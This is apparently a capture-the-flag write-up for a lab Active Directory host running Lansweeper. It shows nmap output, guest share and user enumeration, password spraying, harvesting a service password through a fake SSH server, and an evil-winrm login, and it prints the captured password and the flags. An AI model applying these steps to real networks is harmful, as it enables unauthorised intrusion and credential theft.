- 10.10.92.66
Enumeration
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
82/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=Lansweeper Secure Website
| Subject Alternative Name: DNS:localhost, DNS:localhost, DNS:localhost
| Not valid before: 2021-11-21T09:22:27
|_Not valid after: 2121-12-21T09:22:27
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-02 21:59:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SWEEP
| NetBIOS_Domain_Name: SWEEP
| NetBIOS_Computer_Name: INVENTORY
| DNS_Domain_Name: sweep.vl
| DNS_Computer_Name: inventory.sweep.vl
| DNS_Tree_Name: sweep.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-01-02T21:59:52+00:00
| ssl-cert: Subject: commonName=inventory.sweep.vl
| Not valid before: 2025-01-01T21:55:18
|_Not valid after: 2025-07-03T21:55:18
|_ssl-date: 2025-01-02T22:00:33+00:00; -1s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-02T21:59:53
|_ start_date: N/A
-
Port 81 and 82 running a website called lansweeper taking us to login.aspx so it is a IIS server.
-
port 445 is open
-
port 389 ldap is open
-
port 3389 rdp is open
-
The FQDN is inventory.sweep.vl
-
Lets first edit the
/etc/hostsfile.
- Lets edit the
/etc/krb5.conf
Port 445
- We have guest access to certain shares
-
let’s use smbclient to see if we can find anything interesting
-
Find few files on the share DefaultPackageShare$. Didn’t see anything that i could use directly.
-
Let’s now get list of all the users using rid-brute and saving them in a file.
Administrator
INVENTORY$
jgre808
bcla614
hmar648
jgar931
fcla801
jwil197
grob171
fdav736
jsmi791
hjoh690
svc_inventory_win
svc_inventory_lnx
intern
Lansweeper
We have found different user and one machine account.
-
Let’s now do some password spraying.
-
We found out that user intern has password intern.
-
We again enumerated the share permission using the obtained password.
PORT 389
- Machine Account Quota for user intern is 10
- Performed bloodhound enumeration
PORT 81 and 82
- We found lansweeper running which allowed us to login using intern:intern.
- To get the foothold I used the scanning targets, createad a new scan for IP range and in under scanning credential, I selected map credential and mapper linux user to this.
go install github.com/fffaraz/fakessh@latest
sudo setcap 'cap_net_bind_service=+ep' ~/go/bin/fakessh
- We found the following password for user svc_inventory_lnx
0|5m-U6?/uAX
Generic ALL (Add user to group)
net rpc group addmem "LANSWEEPER ADMINS" "svc_inventory_lnx" -U "sweep.vl"/"svc_inventory_lnx"%'0|5m-U6?/uAX' -S "inventory.sweep.vl"
- We then used evil-winrm to login to the system
Initial Access
evil-winrm -i 10.10.105.103 -u svc_inventory_lnx -p '0|5m-U6?/uAX'
VL{d0f2522312ba549fd2daca09e293bfd1}
VL{06a6c584a3492df1807f1d7c4de0ec56}